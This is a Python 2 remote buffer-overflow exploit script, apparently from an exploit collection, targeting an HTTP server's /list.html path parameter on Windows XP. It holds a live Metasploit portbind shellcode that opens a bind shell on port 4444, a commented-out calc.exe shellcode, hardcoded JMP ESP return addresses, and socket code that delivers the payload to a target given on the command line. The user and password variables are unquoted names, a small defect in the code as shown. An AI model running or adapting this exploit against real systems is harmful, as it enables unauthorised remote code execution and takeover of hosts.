# Modified by JSacco - jsacco@exploitpack.com
import socket,sys,base64

target = sys.argv[1]
port = int(sys.argv[2])
user = anonymous
pwd = anonymous
 
auth = base64.b64encode(user+":"+pwd)
 
buf="A"*1963
buf+="\x90"*179
 
# 165 bytes Calc.exe shellcode / badchars identified and excluded
#buf+=("\xd9\xca\x29\xc9\xb1\x24\xbf\x3f\xc7\x66\x9f\xd9\x74\x24\xf4\x5e"
#"\x31\x7e\x17\x03\x7e\x17\x83\xf9\xc3\x84\x6a\xf9\x24\x0c\x95\x01"
#"\xb5\x06\xd0\x3d\x3e\x64\xde\x45\x41\x7a\x6b\xfa\x59\x0f\x33\x24"
#"\x5b\xe4\x85\xaf\x6f\x71\x14\x41\xbe\x45\x8e\x31\x45\x85\xc5\x4e"
#"\x87\xcc\x2b\x51\xc5\x3a\xc7\x6a\x9d\x98\x2c\xf9\xf8\x6a\x73\x25"
#"\x02\x86\xea\xae\x08\x13\x78\xef\x0c\xa2\x95\x84\x31\x2f\x68\x71"
#"\xc0\x73\x4f\x81\x10\xba\x4f\xed\x1d\xfd\x7f\x68\xe1\x86\x73\xf9"
#"\xa2\x7a\x07\x8d\x3e\x2e\x9c\x05\x37\xdb\xaa\x5e\xc7\xab\xad\x60"
#"\xc8\x40\xc5\x5c\x97\x67\xe0\xfc\x71\x01\xf4\x7f\xbd\x6a\x55\x17"
#"\xce\x07\x51\xb8\x46\x80\xa4\xcc\x99\xe7\xa7\x37\xc6\x66\x34\xd4"
#"\x27\x0c\xbc\x7f\x38")
 


# Win32 Portbind Shellcode (pexfnstsub/metasploit,size=344,port=4444)
buf+=("\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x49"
"\x35\x87\x48\x83\xeb\xfc\xe2\xf4\xb5\x5f\x6c\x05\xa1\xcc\x78\xb7"
"\xb6\x55\x0c\x24\x6d\x11\x0c\x0d\x75\xbe\xfb\x4d\x31\x34\x68\xc3"
"\x06\x2d\x0c\x17\x69\x34\x6c\x01\xc2\x01\x0c\x49\xa7\x04\x47\xd1"
"\xe5\xb1\x47\x3c\x4e\xf4\x4d\x45\x48\xf7\x6c\xbc\x72\x61\xa3\x60"
"\x3c\xd0\x0c\x17\x6d\x34\x6c\x2e\xc2\x39\xcc\xc3\x16\x29\x86\xa3"
"\x4a\x19\x0c\xc1\x25\x11\x9b\x29\x8a\x04\x5c\x2c\xc2\x76\xb7\xc3"
"\x09\x39\x0c\x38\x55\x98\x0c\x08\x41\x6b\xef\xc6\x07\x3b\x6b\x18"
"\xb6\xe3\xe1\x1b\x2f\x5d\xb4\x7a\x21\x42\xf4\x7a\x16\x61\x78\x98"
"\x21\xfe\x6a\xb4\x72\x65\x78\x9e\x16\xbc\x62\x2e\xc8\xd8\x8f\x4a"
"\x1c\x5f\x85\xb7\x99\x5d\x5e\x41\xbc\x98\xd0\xb7\x9f\x66\xd4\x1b"
"\x1a\x66\xc4\x1b\x0a\x66\x78\x98\x2f\x5d\x96\x14\x2f\x66\x0e\xa9"
"\xdc\x5d\x23\x52\x39\xf2\xd0\xb7\x9f\x5f\x97\x19\x1c\xca\x57\x20"
"\xed\x98\xa9\xa1\x1e\xca\x51\x1b\x1c\xca\x57\x20\xac\x7c\x01\x01"
"\x1e\xca\x51\x18\x1d\x61\xd2\xb7\x99\xa6\xef\xaf\x30\xf3\xfe\x1f"
"\xb6\xe3\xd2\xb7\x99\x53\xed\x2c\x2f\x5d\xe4\x25\xc0\xd0\xed\x18"
"\x10\x1c\x4b\xc1\xae\x5f\xc3\xc1\xab\x04\x47\xbb\xe3\xcb\xc5\x65"
"\xb7\x77\xab\xdb\xc4\x4f\xbf\xe3\xe2\x9e\xef\x3a\xb7\x86\x91\xb7"
"\x3c\x71\x78\x9e\x12\x62\xd5\x19\x18\x64\xed\x49\x18\x64\xd2\x19"
"\xb6\xe5\xef\xe5\x90\x30\x49\x1b\xb6\xe3\xed\xb7\xb6\x02\x78\x98"
"\xc2\x62\x7b\xcb\x8d\x51\x78\x9e\x1b\xca\x57\x20\xb9\xbf\x83\x17"
"\x1a\xca\x51\xb7\x99\x35\x87\x48")

buf+="\x90"*15
 
#[ XP SP2 ] -> "\x78\x16\xF3\x77"    #0x77F31678  JMP ESP
buf+="\x78\x16\xF3\x77"
 
#[ XP SP3 ] -> "\x3F\x71\x49\x7E"   #0x7E49713F  JMP ESP
#buf+="\x3F\x71\x49\x7E"
 
buf+="\x90"*30
buf+="\x66\x05\x7A\x03"         #ADD AX,037A
buf+="\x66\x05\x7A\x03"         #ADD AX,037A
buf+="\x66\x05\x7A\x03"         #ADD AX,037A
buf+="\x50\xc3"                 #PUSH EAX + RET
 
print "[+] Launching exploit against " + target + "..."
 
head = "GET /list.html?path="+buf+" HTTP/1.1 \r\n"
head += "Host: \r\n"
head += "Authorization: Basic "+auth+"\r\n"
  
try:
    s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect((target, port))
    s.send(head + "\r\n")
    print "[!] Payload sent..."
    s.close()
except:
    print "[x] Error!"


